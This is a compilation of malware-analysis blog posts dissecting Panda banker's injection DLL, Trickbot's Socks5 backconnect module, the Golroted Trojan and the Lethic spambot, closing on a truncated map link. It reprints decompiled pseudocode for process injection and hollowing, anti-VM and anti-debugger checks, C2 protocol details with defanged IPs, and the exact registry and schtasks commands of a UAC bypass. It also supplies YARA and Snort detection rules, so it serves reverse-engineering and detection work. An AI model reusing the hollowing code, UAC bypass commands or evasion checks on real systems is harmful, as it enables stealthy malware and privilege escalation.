Let’s Learn: Dissect Panda Banking Malware’s "libinject" Process Injection Module

Goal: Unpack and dissect the Panda banking malware injection DLL module titled “libinject.dll.”
Source:
Panda Loader (MD5: 2548a068f7849490c56b63288a8ae5c2)
Panda Loader (unpacked) (MD5: adab9c2b1d897d6a157b82d59f9c2306)
Panda “libinject” (MD5: 47dcbc79f98ff4501619eb5d25da03bd)

Background:
 While analyzing one of the latest Panda malware spam campaings identified by @JAMESWT, I decided to investigate the binary deeper to see some interesting and/or undisclosed ways the malware interacts with the victim environment. Immediately what stood out to me is Panda’s DLL inject module due its compatibility with 32-bit (x86) and 64-bit (x64) architecture.

https://platform.twitter.com/widgets.js By and large, the Panda banker malware leverages the following Windows NTDLL and kernel32 for process injection:

NtUnmapViewOfSection
ZwWow64ReadVirtualMemory64
ZwGetContextThread
ZwSetContextThread
ZwWow64QueryInformationProcess64
NtProtectVirtualMemory
RtlExitUserThread
NtCreateSection
CreateRemoteThread
WriteProcessMemory
ResumeThread

Analysis:
Panda Banker injection module outline

I. Export functions 
II. AcInitialize
III. AdInjectDll
IV. Yara Rule

I. Export functions
The Panda export ordinal functions are as follows:

  • AcInitialize: size_t function type that initializes the structures necessary for the injection export function.
  • AdInjectDll: DWORD function type that performs the process injection with the argument with the desired process ID (PID) as an argument of the DWRD type.

II.  AcInitialize

The functions contain check x64 process check via IsWOW64 returning an integer value. The pseudocoded C++ function is as follows:
The main AcInitialize module check_x64:

  v7 = 0;
  v2 = (FARPROC)dword_10004380;
  if ( dword_10004380
    || (v3 = GetModuleHandleW(L”KERNEL32.DLL”),
        v2 = GetProcAddress(v3, “IsWow64Process”),
        (dword_10004380 = (int)v2) != 0) )
  {
    if ( dwProcessId )
    {
      v4 = OpenProcess(1024u, 0, dwProcessId);
      v2 = (FARPROC)dword_10004380;
    }
    else
    {
      v4 = (HANDLE)a2;
    }
    if ( v4 )
    {
      v5 = ((int (__stdcall *)(HANDLE, int *))v2)(v4, &v7);
      v7 = v5 != 0 ? v7 : 0;
      if ( dwProcessId )
        CloseHandle(v4);
    }
  }

III. AdInjectDll main
The main AdInjectDll sets both createthreadfunction and injectfunction functions, pseudocoded as follows:

DWORD __stdcall AdInjectDll(DWORD dwProcessId)
{
  ULONG v1;
  int v2;
  HANDLE hObject[4];
  *(_OWORD *)hObject = 0i64;
  v1 = -1;
  hObject[2] = (HANDLE)dwProcessId;
  v2 = 0;
  if ( check_if_x64(dwProcessId, 0) )
    v2 = 16;
  hObject[0] = OpenProcess(1082u, 0, dwProcessId);
  if ( hObject[0] )
  {
    if ( createthreadfunction((int)hObject, v2) )
    {
      v1 = injectfunction(hObject, v2);
      CloseHandle(hObject[1]);
    }
    CloseHandle(hObject[0]);
  }
  else
  {
    v1 = GetLastError();
  }
  return v1;
}

A. createthreadfunction
Creates thread either via CreateRemoteThread or NtCreateThreadEx (or both)


B. injectfunction
The malware createa a section via NtCreate and calls NtMapViewOfSection to unmap the payload in memory.
One of the notable Panda features is its  compatibility with x32/x64 architectures is achieved by using IsWow64Process (definition of OS architecture).
ZwWow64QueryInformationProcess64-ZwWow64ReadVirtualMemory64 are used for searching NTDLL in PEB, then for searching API addresses required for work of injecting DLL module (x32/x64) which is being located in AP svchost by using NtCreateSection-NtMapViewOfSection-NtUnmapViewOfSection ResumeThread-Sleep-SuspendThread are used for unmapping and injecting the payload into the main thread.
IV. Yara Rule

rule crime_win32_64_panda_libinject_dll_module {
meta:
description = “Panda Banker linject DLL modile”
author = “@VK_Intel”
reference = “Detects Panda Banker libinject.dll”
date = “2018-01-10”
hash = “75db065b70c6bce9117e46a6201d870e580d07b7c3ee6d2ddab34df0b5dff51f”
strings:
$lib = “libinject.dll” fullword ascii

$export1 = “AdInjectDll” fullword ascii
$export2 = “AcInitialize” fullword ascii

$import0 = “ZwWow64QueryInformationProcess64” fullword ascii
$import1 = “ZwWow64ReadVirtualMemory64” fullword ascii
$import2 = “NtCreateSection” fullword ascii
$import3 = “NtUnmapViewOfSection” fullword ascii
$import4 = “NtGetContextThread” fullword ascii
$import5 = “NtSetContextThread” fullword ascii
$import6 = “WriteProcessMemory” fullword ascii
$import7 = “ResumeThread” fullword ascii
$import8 = “CreateRemoteThread” fullword ascii
$import9 = “VirtualAllocEx” fullword ascii

condition:
all of ($export*) and one of $lib and all of ($import*)
}

Let’s Learn: Trickbot Socks5 Backconnect Module In Detail

GoalReverse the Trickbot Socks5 backconnect module including its communication protocol and source code-level insights.

SourceDecoded Trickbot Socks5 backconnect module
(33ad13c11e87405e277f002e3c4d26d120fcad0ce03b7f1d4831ec0ee0c056c6)
Background:
  • The Trickbot banking Trojan is notable for its backconnect Socks5 module titled “bcClientDllTest.” This module is used extensively by the gang for online account takeover fraud. This module was obtained while analysing the Trickbot infection chain from the email campaign impersonating PayPal (thanks to @Ring0x0).

https://platform.twitter.com/widgets.jsThe decoded Trickbot Socks5 DLL module contains the following export functions:

Name Address Ordinal
Control 0x100118B8 1
FreeBuffer 0x100027DE 2
Release 0x100118C3 3
Start 0x100118E4 4

In this blog, we are primarily interested in analyzing the “Start” export function (ordinal #4).

The blog outline is as follows:
I. “Start” configuration template
II. Module CreateThread function
III. Bot ID generator function
IV. Dynamic API-loading function
V. IP resolution function
VI. Network communication commands
VI. Communication analysis
VII. Yara rule
VIII. Snort signature
I. “Start” Configuration Template
First, the backconnect module “Start” export loads the default configuration template as follows:
yes
II. Module CreateThread Function

Next, the module creates a new thread via CreateThread API with (LPTHREAD_START_ROUTINE)StartAddress copping the configuration template into the dword_10034904 memory location via strstr API containing the sequence of characters to match “.”. The pseudocoded Start function is as follows:
void *__stdcall Start(int a1, int a2, int a3, int a4, char *a5, int a6, int a7, int a8)
{
  unsigned int v8′
  unsigned int v9; 
  char v10;
  void *result;

  v8 = 0;
  v9 = strlen(aModuleconfigAu);
  if ( v9 )
  {
    do
    {
      v10 = aModuleconfigAu[v8++];
      byte_100349A4 = v10;
    }
    while ( v8 < v9 );
  }
  result = 0;
  if ( !dword_10034900 )
  {
    memset(byte_10034908, 0, 0x20u);
    byte_10034908[32] = 0;s
    qmemcpy(byte_10034908, strstr(a5, “.”) + 1, 0x20u);
    dword_10034900 = 1;
    CreateThread(0, 0, (LPTHREAD_START_ROUTINE)StartAddress, 0, 0, 0);
    result = malloc(0x400u);
    dword_10034904 = (int)result;
  }
  return result;
}
III. Bot ID generator function
One of the first notable functions is that the module creates a bot identifier (ID) leveraging a security identifier (SID) for the account and the name of the domain with the sequence of GetVolumeInformationA, GetUserNameA,and LookupAccountNameA, wherein the bot id (also referred later as “client_id”) is a serial number of the hard drive that stores the C section. The value is created using XOR operation on SID.

The simplified C++ DWORD function is as follows:
DWORD bot_id_generator()
{
  CHAR VolumeNameBuffer; 
  CHAR FileSystemNameBuffer; 
  DWORD FileSystemFlags;
  enum _SID_NAME_USE peUse; 
  DWORD MaximumComponentLength; 
  DWORD cbSid;
  DWORD pcbBuffer;
  DWORD cchReferencedDomainName; 
  LPSTR ReferencedDomainName;
  DWORD VolumeSerialNumber; 
  LPSTR lpBuffer; 
  PSID Sid;
  int i; 

GetVolumeInformationA(
    “C:\\“,
    &VolumeNameBuffer,
    0x80u,
    &VolumeSerialNumber,
    &MaximumComponentLength,
    &FileSystemFlags,
    &FileSystemNameBuffer,
    0x80u);
  lpBuffer = (LPSTR)malloc(0x1000u);
  pcbBuffer = 4096;
  Sid = malloc(0x1000u);
  cbSid = 4096;
  ReferencedDomainName = (LPSTR)malloc(0x1000u);
  cchReferencedDomainName = 4096;
  GetUserNameA(lpBuffer, &pcbBuffer);
  memset(Sid, 0, 0x1000u);
  LookupAccountNameA(0, lpBuffer, Sid, &cbSid, ReferencedDomainName, &cchReferencedDomainName, &peUse);
  for ( i = 0; i <= 16; ++i )
    VolumeSerialNumber ^= *((_DWORD *)Sid + i);
  free(lpBuffer);
  free(Sid);
  free(ReferencedDomainName);
  return VolumeSerialNumber;
}
IV. Dynamic API-Loading Function
The module proceeds to load dynamically the following Windows API via usual sequence LoadLibrary/GetModuleHandleA/GetProcAddress:
  v1 = GetModuleHandleA(“kernel32.dll”);
  v58 = GetProcAddress(v1, “HeapAlloc”);
  v2 = GetModuleHandleA(“kernel32.dll”);
  v57 = GetProcAddress(v2, “HeapFree”);
  v3 = GetModuleHandleA(“kernel32.dll”);
  v236 = GetProcAddress(v3, “GetProcessHeap”);
  v4 = GetModuleHandleA(“ntdll.dll”);
  v56 = GetProcAddress(v4, “sprintf”);
  v5 = GetModuleHandleA(“ntdll.dll”);
  v29 = GetProcAddress(v5, “strcat”);
  v6 = GetModuleHandleA(“wininet.dll”);
  v39 = GetProcAddress(v6, “InternetOpenA”);
  v7 = GetModuleHandleA(“wininet.dll”);
  v43 = GetProcAddress(v7, “InternetOpenUrlA”);
  v8 = GetModuleHandleA(“wininet.dll”);
  v55 = GetProcAddress(v8, “InternetReadFile”);
  v9 = GetModuleHandleA(“wininet.dll”);
  v61 = GetProcAddress(v9, “InternetCloseHandle”);
The module then checks if the operation succeeded comparing the predefined location at DWORD at 0x10034900 of “0”.
V. IP Resolution Function
The malware copies its default user agent into the placeholder ‘Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US),” which is later utilized for network communications. The malware leverages the user agent with the resolved hardcoded default IPs, which are oftentimes changed by the Trickbot. The resolution is accomplished with the following API calls:
inet_addr
DnsQuery_A
inet_ntoa
The BOOL-type function is as follows:
BOOL __cdecl Trick_backconnect_IP_resolution(int a1, _BYTE *a2)
{
  char *cp;
  const char *v4;
  const char *v5;
  const char *v6;
  const char *v7;
  const char *v8;
  const char *v9;
  const char *v10;
  const char *v11;
  const char *v12;
  _BYTE *v13;
  int v14;
  struct in_addr in;
  int v16;
  char *v17;
  int v18;
  int v19;
  _BYTE *v20;
  int i;
  HLOCAL hMem;
  char v23;
  char v24;
  *a2 = 0;
  v19 = 0;
  v18 = 0;
  cp = “69.164.196[.]21”;
  v4 = “107.150.40[.]234”;
  v5 = “162.211.64[.]20”;
  v6 = “217.12.210[.]54”;
  v7 = “89.18.27[.]34”;
  v8 = “193.183.98[.]154”;
  v9 = “51.255.167[.]0”;
  v10 = “91.121.155[.]13”;
  v11 = “87.98.175[.]85”;
  v12 = “185.97.7[.]7”;
  v16 = 10;
  hMem = LocalAlloc(0x40u, 8u);
  v24 = 0;
  for ( i = 0; i < v16; ++i )
  {
    *((_DWORD *)hMem + 1) = inet_addr((&cp)[4 * i]);
    *(_DWORD *)hMem = 1;
    v14 = DnsQuery_A(a1, 1, 2, hMem, &v19, 0);
    v18 = v19;
    if ( v19 )
    {
      in = *(struct in_addr *)(v18 + 24);
      v17 = inet_ntoa(in);
      v20 = a2;
      v13 = a2;
      do
      {
        v23 = *v17;
        *v20 = v23;
        ++v17;
        ++v20;
      }
      while ( v23 );
      v24 = 1;
    }
    if ( v24 )
      break;
  }
  if ( hMem )
    LocalFree(hMem);
  if ( v19 )
    DnsFree(v19, 1);
  return v24 != 0;
}
VI. Communication Protocol
The following commands are used for client-server communications initially with the command prefix “c”:
disconnect: Terminate the backconnect server connection
idle: Maintain the client-server connection
connect: connect to the backconnect server. The command must consist of the following parameters:
      ip: Backconnect server’s IP address
      auth_swith: Use authorization flag. If the value is set to “1”, the Trojan receives the auth_login and auth_pass parameters. If the value is “0”, the Trojan gets the auth_ip parameter. Otherwise, the connection will not be established.
auth_ip: Authentication IP address
auth_login: Authentication login
auth_pass: Authentication password
VI. Deeper Dive into Client-Server Protocol
By and large, there are three main Trickbot Socks5 server-client commands:
c=idle
c=disconnect
c=connect
The Trickbot client forms a sequence of GET requests to the server (usually, on gate[.]php):
client_id=&connected=&server_port=&debug= 
The server POST response with the following parameters if the connection needs to be established:
 c=connect&ip=&auth_swith=&auth_ip=&auth_login=&auth_pass=
If the connection needs to be terminated, the server will respond with “c=disconnect.” Most of the currently observed Trickbot Socks5 backconnect servers contain Blockchain name server resolution.

VII. YARA RULE

rule crime_win32_trick_socks5_backconnect {

        meta:
                description = “Trickbot Socks5 bckconnect module”
                author = “@VK_Intel”
                reference = “Detects the unpacked Trickbot backconnect in memory”
                date = “2017-11-19”
                hash = “f2428d5ff8c93500da92f90154eebdf0”
        strings:
                $s0 = “socks5dll.dll” fullword ascii
                $s1 = “auth_login” fullword ascii
                $s2 = “auth_ip” fullword ascii
`               $s3 = “connect” fullword ascii
                $s4 = “auth_ip” fullword ascii
                $s5 = “auth_pass” fullword ascii
                $s6 = “thread.entry_event” fullword ascii
                $s7 = “thread.exit_event” fullword ascii
                $s8 = “” fullword ascii
                $s9 = “” fullword ascii
                $s10 = “yes” fullword ascii
        condition:
                uint16(0) == 0x5a4d and filesize < 300KB and 7 of them
}

VIII. SNORT RULE

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”Possible Trickbot Socks5 Backconnect check-in alert”; flow:established,to_server; content:”gate.php”; http_uri; content:”?client_id=”; http_uri; content:”&connected=”; http_uri; content:”&server_port=”; http_uri; content:”&debug=”; http_uri; reference:url,http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html; classtype:Trojan-activity; rev:1;)

Let’s Learn: Dissecting Golroted Trojan’s Process Hollowing Technique & UAC Bypass in HKCU\Environment

Goal: Reverse the Golroted Trojan with the focus on its native API process hollowing technique and User Account (UAC) bypass method exploiting Environment variables in Scheduled Tasks.

Source:
Golroted Trojan sample 
(e73b20f639cd9ecc4c8196e885de57043a4baddb70bb4b66e1df13abc7da487e)

Background
By and large, the Golroted Trojan is notable due to its native call (Nt* API-based) process hollowing technique, its user account (UAC) bypass method, and anti-virus checks. It appears to be a relatively popular Trojan, masked as a  “.scr” file, distributed lately as part of the spam impersonating IRS (thanks to @pollo290987).
The following functions of interest will be analyzed:

  • Process hollowing
  • UAC bypass
  • Anti-virus checks
  • Persistence mechanism
  • and others
  • Yara signature

I. Process hollowing
The malware starts a process suspended with CreateProcessA(0x4 CREATE_SUSPENDED process creation flag). Ultimately, the malware replaces its content with the content of another. The malware allocates memory for the process replacement via NtAllocateVirtualMemory. Golroted obtains the thread context of the child process’ primary thread via NtGetContextThread, then retrieves the PEB address from the ebx register and reads the base address of the executable image from the PEB via NtUnmapViewOfSection. Then, the malware writes the base address of the injected image into the PEB via NtWriteVirtualMemory and sets the thread context of the child process’ primary thread via NtSetContextThread, which is finally resumed the primary thread via NtResumeThread.

The following native API calls the Golroted malware leverages for process hollowing:

  • NtGetContextThread
  • NtReadVirtualMemory
  • NtUnmapViewOfSection
  • NtSetContextThread
  • NtProtectVirtualMemory
  • NtWriteVirtualMemory
  • NtFlushInstructionCache
  • NtAllocateVirtualMemory
  • NtResumeThread

The shortened and simplified process hollowing technique is as follows:

if(CreateProcessA(NULL,DESIRED_PROCESS,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi))
{
NtGetContextThread(pi.hThread,&ctx);
NtReadVirtualMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&base,sizeof(PVOID),NULL);

  if((DWORD)base==pINH->OptionalHeader.ImageBase)
{
NtUnmapViewOfSection(pi.hProcess,base);
}

  mem=VirtualAllocEx(pi.hProcess,(PVOID)pINH->OptionalHeader.ImageBase,pINH->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

  NtWriteVirtualMemory(pi.hProcess,mem,image,pINH->OptionalHeader.SizeOfHeaders,NULL);

  for(i=0;iFileHeader.NumberOfSections;i++)
{
pISH=(PIMAGE_SECTION_HEADER)((LPBYTE)image+pIDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(i*sizeof(IMAGE_SECTION_HEADER)));
NtWriteVirtualMemory(pi.hProcess,(PVOID)((LPBYTE)mem+pISH->VirtualAddress),(PVOID)((LPBYTE)image+pISH->PointerToRawData),pISH->SizeOfRawData,NULL);
}

  ctx.Eax=(DWORD)((LPBYTE)mem+pINH->OptionalHeader.AddressOfEntryPoint);

  NtWriteVirtualMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&pINH->OptionalHeader.ImageBase,sizeof(PVOID),NULL);
NtSetContextThread(pi.hThread,&ctx);

  NtResumeThread(pi.hThread,NULL);

  NtClose(pi.hThread);
NtClose(pi.hProcess);
}

A. “Self injection”
The malware retrieves the path to itself via GetModuleFilenameA call and passes itself as an argument to the process hollowing function.

B. “Default Browser”
Golroted obtains the following browser locations in C:\\Program Files (x86)\\ or %PROGRAMFILES% and passes the output as an argument to the process hollowing function:

  • Mozilla Firefox\\firefox.exe
  • \Google\Chrome\Application\chrome.exe
  • Internet Explorer\\iexplore.exe


The code blob is as follows:

int __usercall ff_chrome_ie_func@(volatile signed __int32 *a1@, int a2@)
{
  volatile signed __int32 *v2;
  int v3;
  int v4;
  int v5; 
  unsigned int v7;
__writefsdword(0, (unsigned int)&v7);
  pfiles_path_search_func((int *)&v13, 0);
  func11((int *)&v16, v13, (signed __int32)”Mozilla Firefox\\firefox.exe”);
  pfiles_path_search_func((int *)&v12, v3);
  func11((int *)&v15, v12, (signed __int32)”\\Google\\Chrome\\Application\\chrome.exe”);
  pfiles_path_search_func((int *)&v11, v4);
  func11((int *)&v14, v11, (signed __int32)”Internet Explorer\\iexplore.exe”);


C. “Notepad”
The malware retrieves the path to notepad.exe in  C:\Windows\SysWOW64\ and C:\Windows\system32\  passes itself as an argument to the process hollowing function.

II. UAC bypass
Golroted checks if the victim host has administrator privileges via IsUserAnAdmin API call. Then, if not admin, the malware executes the so-called “fileless” UAC bypass method that exploits Environment variables in Scheduled Tasks. This method is almost identical to the UAC bypass tweeted out in May 2017 by James Forshaw (@tiraniddo).

The UAC code function is as follows:

uac_bypass(
      v10,
      3,
      ”          \” /f && exit”,
      v37,
      “/c reg add hkcu\\Environment /v windir /d \”cmd /c start “,
      v20,
      v21,
      v22);
    create_process_fuc(“C:\\Windows\\System32\\cmd.exe”, v32);
    Sleep(2000);
    create_process_fuc(
      “C:\\Windows\\System32\\cmd.exe”,
      “/c schtasks /Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I && exit”);
    Sleep(1000);
    create_process_fuc(“C:\\Windows\\System32\\cmd.exe”, “/c reg delete hkcu\\Environment /v windir /f && exit”);
    kernel32_wow64_func(0);
    ExitProcess_0(0);


III. Anti-virus checks
A. Bitdefender
Golroted checks for the following Bitdefender location:

  • C:\Program Files\Bitdefender


B. Kaspersky Anti-Virus
The malware checks for the following Kaspersky AV locations and processes:

  • Kaspersky Lab\Kaspersky Anti-Virus 
  • .0.0\avpui.exe
  • C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 
  • Kaspersky Lab\Kaspersky Internet Security 
  • C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security
  • If the malware finds Kaspersky AV, it shuts down the machine


The C++ code is as follows:

  if ( v4 )
  {
    yourself_func2(0, &v47);
    func30(v47, (int *)&v48);
    v5 = v48;
    func30(v50, (int *)&v46);
    if ( !func16(v46, v5) && v50 )
      ShellExecuteA(0, “open”, “cmd.exe”, “/C shutdown -f -r -t 0”, &dword_417AB4, 0);
    func2((int)”PROGRAMFILES”, (int *)&v45);
    func11(&v49, v45, (signed __int32)”Kaspersky Lab\\Kaspersky Anti-Virus “);
    v7 = 13;
    do
    {
      v8 = v49;
      func31(v6, &v44, v7);
      func23(v9, 3, “.0.0\\avpui.exe”, v44, v8, v31, v32, v33);
      if ( (unsigned __int8)findfile_local(v31, v32, v33, v34) )
      {
        v10 = v49;
        func31(v6, &v43, v7);
        func23(v11, 3, “.0.0\\avpui.exe”, v43, v10, v31, v32, v33);
        goto LABEL_22;
      }
      ++v7;
    }
    while ( v7 != 27 );


IV. Persistence mechanism

Golroted creates persistence as .lnk in “[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\\Startup\.”

The code blob is C++ is as follows:

     temp_func(&v92, v19);
      func4(v20, v92);
      v69 = v93;
      func4(v21, v103);
      v68 = v91;
      func_string(v22, 3, L”.lnk”);
      v23 = (const char *)func5(v68);
      Mycomput_dll_func(*a6, v23, a12, a4, (unsigned int)v12);
      temp_func(&v89, v24);
      v25 = v103;
      GetUserName_func(&v88, v26);
      func23(
        v27,
        8,
        “.lnk\””,
        v103,
        “\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\”,
        v88,
        “.lnk\” \”C:\\Users\\”,
        v25);
      v28 = func19(v90);
      ShellExecuteA(0, “open”, “cmd.exe”, v28, v68, v69);


V. Delete Zone.Identifier flag using DeleteFile function

The malware deletes the zone identifier flag via DeleteFileA API to avoid being flagged by Explorer and prevent possible alert boxes when launching the executable.

VI. Miscellaneous
Golroted also has various debug information that was presumably used for internal testing including “Notepad” process hollowing and the following presumably placeholders:

  • binderfolderxD
  • bindermode
  • binderextension
  • randomfolderxD

The observed mutex was as follows “UfeRKBdMoE”

Yara Signature

rule crime_win32_golrote_trojan {
        meta:
                description = “Golroted Trojan rule – file golroted.exe”
                author = “@VK_Intel”
                reference = “Detects Golroted Trojan”
                date = “2017-11-11”
                hash = “e73b20f639cd9ecc4c8196e885de57043a4baddb70bb4b66e1df13abc7da487e”

        strings:
                $s0 = “C:\\Windows\\System32\\Mycomput.dll” fullword ascii
                $s1 = “.lnk\” \”C:\\Users\\” fullword ascii
                $s2 = “vbc.exe” fullword ascii 
                $s3 = “System32\\WerFault.exe” fullword ascii
                $s4 = “system32\\notepad.exe” fullword ascii
                $s5 = “Mozilla Firefox\\firefox.exe” fullword ascii
                $s6 = “FC:\\Windows\\System32\\” fullword ascii
               $s7 = “C:\\Windows\\SysWOW64\\ntdll.dll” fullword ascii
                $s9 = “Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe” fullword ascii
                $s10 = “Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe” fullword ascii
                $s11 = “/c reg add hkcu\\Environment /v windir /d \”cmd /c start ” fullword ascii
                $s12 = “bindedfiledropandexecute” fullword ascii
                $s13 = “/c schtasks /Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I && exit” fullword ascii
                $s14 = “Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe” fullword ascii
                $s15 = “Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe” fullword ascii
                $s16 = “C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security ” fullword ascii
                $s17 = “\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\” fullword ascii
        condition:
                uint16(0) == 0x5a4d and filesize < 500KB and all of them
}

https://platform.twitter.com/widgets.js

Let’s Learn: Lethic Spambot & Survey of Anti-Analysis Techniques

Goal: Reverse the latest Lethic spambot, shared by Brad from Malware Traffic Analysis with the focus on its plethora of various anti-analysis and anti-virtual machine checks.

Source:

Background
While analyzing the Lethic spambot (thanks to @malware_traffic), unpacked and reviewed some of the bot internals. By and large, the spambot leverages process injection into explorer.exe through usual WriteProcessMemory and CreateRemoteThread. This Lethic hardcoded call back IP is 93[.]190[.]139[.]16. Another unique feature of this Trojan is persistency in C:\RECYCLER\* as “backwindow32.exe” and usual registry RUN keys.
Malware checks:
I. Wine check
II. Anti-analysis process check
III. Anti-analysis DLL check
IV. UserName check
V. Path string check
VI. Virtual Machine (VM) process check
VII. VM registry and VM CreateFile check
VIII. Anti-sleep bypass check
IX. Anti-debugger check

I. Wine check
The Lethic spambot checks for the presence of Wine on the victim machine as follows checking the ntdll and kernel32 DLL’s for the following functions via GetProcAddress API:
  • wine_get_version
  • wine_get_unix_file_name
A.     wine_get_version
The pseudo-coded C++ function is as follows:

signed int anti_wine_get_version()
{
  HMODULE hModule;
  signed int v2;

  v2 = 0;
  hModule = GetModuleHandleA(“ntdll.dll”);
  if ( hModule && GetProcAddress(hModule, “wine_get_version”) )
    v2 = 1;
  return v2;
}
B.     wine_get_unix_file_name
The pseudo-coded C++ function is as follows:
 signed int wine_get_unix_file_name()
{
  HMODULE hModule;
  signed int v2;

  v2 = 0;
  hModule = GetModuleHandleA(“kernel32.dll”);
  if ( hModule && GetProcAddress(hModule, “wine_get_unix_file_name”) )
    v2 = 1;
  return v2;
} 
II. Anti-analysis process check
The Trojan checks for the following processes and suspends threads if they exist on the host:

regmon.exe
filemon.exe
procdump.exe
procexp.exe
wireshark.exe
prcview.exe
sysinspector.exe
sniff_hit.exe
proc_watch.exe
apimonitor.exe
tcpview.exe
petools.exe
vmtoolsd.exe
autoruns.exe
 The suspend thread function is as follows:
HANDLE __cdecl suspend_thread_function (int a1)
{
  HANDLE result;
  HANDLE hThread;
  THREADENTRY32 te;
  HANDLE hSnapshot;

  te.dwSize = 0;
  te.cntUsage = 0;
  te.th32ThreadID = 0;
  te.th32OwnerProcessID = 0;
  te.tpBasePri = 0;
  te.tpDeltaPri = 0;
  te.dwFlags = 0;
  result = CreateToolhelp32Snapshot(4u, 0);
  hSnapshot = result;
  if ( result != (HANDLE)-1 )
  {
    te.dwSize = 28;
    if ( Thread32First(hSnapshot, &te) )
    {
      do
      {
        if ( te.th32OwnerProcessID == a1 )
        {
          hThread = OpenThread(2u, 0, te.th32ThreadID);
          SuspendThread(hThread);
          CloseHandle(hThread);
        }
      }
      while ( Thread32Next(hSnapshot, &te) );
    }
    result = (HANDLE)CloseHandle(hSnapshot);
  }
  return result;
}
III. Anti-analysis DLL check
The malware checks for the presence of loaded DLL’s.
The list of all checked DLL is as follows:
api_log.dll
log_api32.dll
dir_watch.dll
pstorec.dll
vmcheck.dll
wpespy.dll
snxhk.dll
IV. UserName check
The malware checks for specific host usernames via retrieving them with GetUserName API and converting them to upper case.
The list of the checked usernames is as follows:
MALTEST
TEQUILABOOMBOOM
SANDBOX
VIRUS
MALWARE
V. Path string check
The malware checks for specific path strings aliases via retrieving them with GetModuleFileName API and converting them to upper case.
The list of the checked path strings is as follows:
SAMPLE
MALWARE
SANDBOX
VIRUS
The malware also checks if it is named “sample.”


VI. Virtual Machine (VM) process check
Lethic checks for the presence of the VM-related processes.
The full list of all checked processes is as follows:
vmusrvc.exe
vmsrvc.exe
xsvc_depriv.exe
xenservice.exe
VII. VM registry keys check
The malware checks for the registry artefacts associated with VM.
The following registry locations and values are checked:
A. HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier
  • VMWARE
  • QEMU
B. HKLM\HARDWARE\Description\System\SystemBiosVersion
  • VBOX
  • QEMU
C. HKLM\HARDWARE\Description\System\VideoBiosVersion
  • VIRTUALBOX
  • BOCHS


D. HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions
E. The malware tries to create a file “\\\\.\\VBoxGuest” and checks if it exists.
The C++ pseudocode is as follows:
signed int vm_createfile_check()
{
  signed int v1;
  HANDLE hObject;

  v1 = 0;
  hObject = CreateFileW(L”\\\\.\\VBoxGuest”, 1u, 1u, 0, 4u, 0, 0);
  if ( hObject != (HANDLE)-1 )
  {
    CloseHandle(hObject);
    v1 = 1;
  }
  return v1;
}
VIII. Anti-sleep bypass check
The malware implements Sleep API patch/hook check preventing the analyst from patching/hooking Sleep to a return.
The routine is as follows:

signed int anti_sleep_hook_check()
{
  DWORD v0;
  signed int v2;

  v2 = 1;
  v0 = GetTickCount();
  Sleep(500);
  if ( GetTickCount() – v0 <= 440 )
    Sleep(0);
  else
    v2 = 0;
  return v2;
}
IX. Anti-debugger check
The malware calls IsDebuggerPresent and CheckRemoteDebuggerPresent APIs to check for the debugger presence.
The function in C++ is as follows:
int anti_debugger_check()
{
  BOOL pbDebuggerPresent;
  int v2;

  pbDebuggerPresent = 0;
  v2 = 0;
  if ( IsDebuggerPresent() || CheckRemoteDebuggerPresent((HANDLE)0xFFFFFFFF, &pbDebuggerPresent) && pbDebuggerPresent )
    v2 = 1;
  return v2;
}

Cridex/Geodo/Emotet/Dridex Node Map Visualizer

Goal: Visualize all possible Cridex/Geodo/Emotet/Dridex node infections on the map using Fusion Map
Source: OSINT and other feed intel
https://fusiontables.google.com/embedviz?containerId=googft-gviz-canvas&viz=GVIZ&t=GRAPH&gc=true&gd=true&sdb=1&rmax=100000&q=select+col6%2C+col0%2C+col3+from+1uZfgN0_tazPf9UVoIIiptra5ByDAanDFIcGX384g&qrs=+where+col6+%3E%3D+&qre=+and+col6+%3C%3D+&qe=&uiversion=2&state=%7B%22ps%22%3A%221_2_-10_o_0_-a_-1f_95_y_5z_bg_-1h_1u_ae_-9_-d_am_-29_1l_ri_-2_5w_ql_-b_-q_o4_-1g_-j_5t_-t_-h_16_-x_1v_4n_-1w_-v_hi_-2k_o_pz_-3_56_y_f_a_nt_-2c_g_de_-28_3_f4_-2c_y_eg_-2p_17_eh_-x_29_n1_-1v_1m_qv_-2m_z_6s_-1o_28_5q_-y_-p_mw_-g_1u_kz_-23_18_n0_-1c_23_qn_-2s_s_e8_-21_-4_pe_-f_25_ox_-2o_2_rd_-25_-q_nh_-o_23_nd_-2m_1f_3b_-1t_-2d_7o_-2e_1t_62_-22_9_k1_-3_0_ia_-4_1k_px_3_1b_83_-23_1i_mq_-6_23_1c_-1m_-y_km_-2e_17_ma_-28_q_eq_-1z_1w_qt_-1c_2d_ad_-2_1t_2l_-1m_-a_qc_1x_52_qj_-19_66_l5_a_15_nv_5_g_gv_-o_2l_m0_-2h_24_gg_-l_2d_17_j_1s_j7_-o_2u_gw_-y_-17_4m_3_-i_qq_1e_5g_w_-22_-1c_5i_k_x_30_1_-3y_pv_a_63_qi_1t_5i_3s_-8_-4k_t_-30_-9_2a_-x_-2p_l3_7_-1g_56_i_-26_3u_24_-a_3v_1p_-q_no_1e_-1e_q3_-1j_3s_12_1p_3_5g_f_-4i_4s_r_-6_og_-y_2j_5p_-2g_-c_53_-2